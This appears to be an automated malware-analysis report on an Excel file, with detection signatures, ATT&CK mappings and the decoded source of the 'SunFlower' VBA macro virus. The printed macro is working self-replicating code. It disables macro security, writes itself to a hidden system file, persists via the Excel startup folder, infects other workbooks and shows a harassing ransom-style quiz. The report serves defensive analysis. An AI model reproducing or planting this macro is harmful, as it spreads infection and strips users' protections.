MALICIOUS
188
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1105 Ingress Tool Transfer
T1547.001 Registry Run Keys / Startup Folder
The sample contains VBA macros that leverage `CreateObject` and attempt to write its own code to `C:\Windows\xedit.drv`, likely to download and execute a second-stage payload. It also attempts to establish persistence by saving itself as `Book1.` in the application startup path. The presence of `Win.Trojan.Psycho-3` and `Win.Trojan.SunFlower-1` signatures further supports its malicious nature.
Heuristics 4
-
ClamAV: Win.Trojan.Psycho-3 critical CLAMAV_DETECTIONClamAV detected this file as malware: Win.Trojan.Psycho-3
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
Urgency / deadline lure low SE_URGENCY_LUREDocument contains urgency or deadline language ('account will be terminated', 'action required within 24 hours', etc.) — useful context, but low-signal without other findings
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6044 bytes |
SHA-256: c587b4a903c0e16ae0e8b0b5d328a76e8a3f6fe9d2943dcb879343081f062c22 |
|||
|
Detection
ClamAV:
Win.Trojan.SunFlower-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Declare Function ExitWindowsEx& Lib "user32" (ByVal uFlags As Long, ByVal dwReserved As Long)
Private Const EWX_REBOOT = 2
' MarshYello
Private Sub Workbook_Deactivate()
' SunFlower virus By Yello & WalruS (Sept 2000)
On Error Resume Next
With Application
.DisplayAlerts = (5 * 2 - 10)
.Application.ScreenUpdating = (5 * 2 - 10)
.Application.DisplayStatusBar = (5 * 2 - 10)
End With
CommandBars("Macro").Controls("Security...").Enabled = False
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
Open "C:\Windows\xedit.drv" For Output As #1
Print #1, VBProject.VBComponents(1).codemodule.Lines(1, 110)
Close #1
SetAttr ("C:\Windows\xedit.drv"), 6
Set ActiveWB = ActiveWorkbook.VBProject.VBComponents("ThisWorkbook").codemodule
Set ThisWB = ThisWorkbook.VBProject.VBComponents("ThisWorkbook").codemodule
CheckExist = Dir(Application.StartupPath & "\Book1.")
If CheckExist = "" Then
VBAProject.ThisWorkbook.SaveAs Filename:=Application.StartupPath & "\Book1.", FileFormat:=xlNormal, AddToMru:=False
End If
If ActiveWB.Lines(3, 1) <> "' MarshYello" Then
ActiveWB.DeleteLines 1, ActiveWB.CountofLines
ActiveWB.AddFromFile ("C:\Windows\xedit.drv")
ActiveWorkbook.Save
End If
If Second(Now) > 58 Then Call PayloadOne
End Sub
Private Sub PayloadOne()
Assistant.Visible = True
With Assistant.NewBalloon
.Icon = msoIconAlertWarning
.Text = "SunFlower Virus"
.Heading = "Yello & WalruS Have You!"
.Show
End With
MsgBox "Hello there " + Application.UserName + Chr(13) + Chr(13) + "Yello & WalruS have control of you P.C." + Chr(13) + Chr(13) + "We have temporally hidden some of your important windows files." + Chr(13) + Chr(13) + "Re-boot now and your P.C will never be the same" + Chr(13) + Chr(13) + "Do yourself a favour and answer our questions" + Chr(13) + Chr(13) + "Get them right and your files will be restored" + Chr(13) + Chr(13) + "Get them wrong and its godnight vienna", vbCritical, "SunFlower Virus"
question1 = "Divide 30 by 1/2 and add 10. What is the answer ?"
question2 = "Name one of the authors of this virus ?"
question3 = "What does the 'V' stand for in DVD ?"
Count = 1
Do
Q1 = InputBox("O.k, Question 1" + Chr(13) + Chr(13) + question1, "SunFlower Virus")
Count = Count + 1
Loop Until Q1 = "70"
Count = 1
Do
Q2 = InputBox("O.k, Question 2 a bit harder this time" + Chr(13) + Chr(13) + question2, "SunFlower Virus")
Count = Count + 1
If Count = 5 Then MsgBox "Hint: One's a colour!", vbInformation, "I Am The ........."
Loop Until Q2 = "Walrus" Or Q2 = "walrus" Or Q2 = "Yello" Or Q2 = "yello" Or Q2 = "Yellow" Or Q2 = "yellow"
Count = 1
Do
If Count = 3 Then MsgBox "Last Chance", vbInformation, "SunFlower Virus"
If Count = 4 Then Call KickOut
Q3 = InputBox("O.k, Question 3, Get this correct and your home and dry " + Chr(13) + Chr(13) + question3, "SunFlower Virus")
Count = Count + 1
Loop Until Q3 = "Versatile" Or Q3 = "versatile"
Assistant.Visible = True
With Assistant.NewBalloon
.Icon = msoIconAlert
.Text = "Well done. Be Alert...."
.Heading = "Yello & WalruS have left the building" + Chr(13) + " Or have they ?"
.Show
End With
Assistant.Animation = msoAnimationGetTechy
End Sub
Private Sub KickOut()
Dim i As Integer
On Error Resume Next
MsgBox "Is it " & Time & " Already ?" + Chr(13) + Chr(13) + "Ive got to go", vbCritical, "Brain D
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.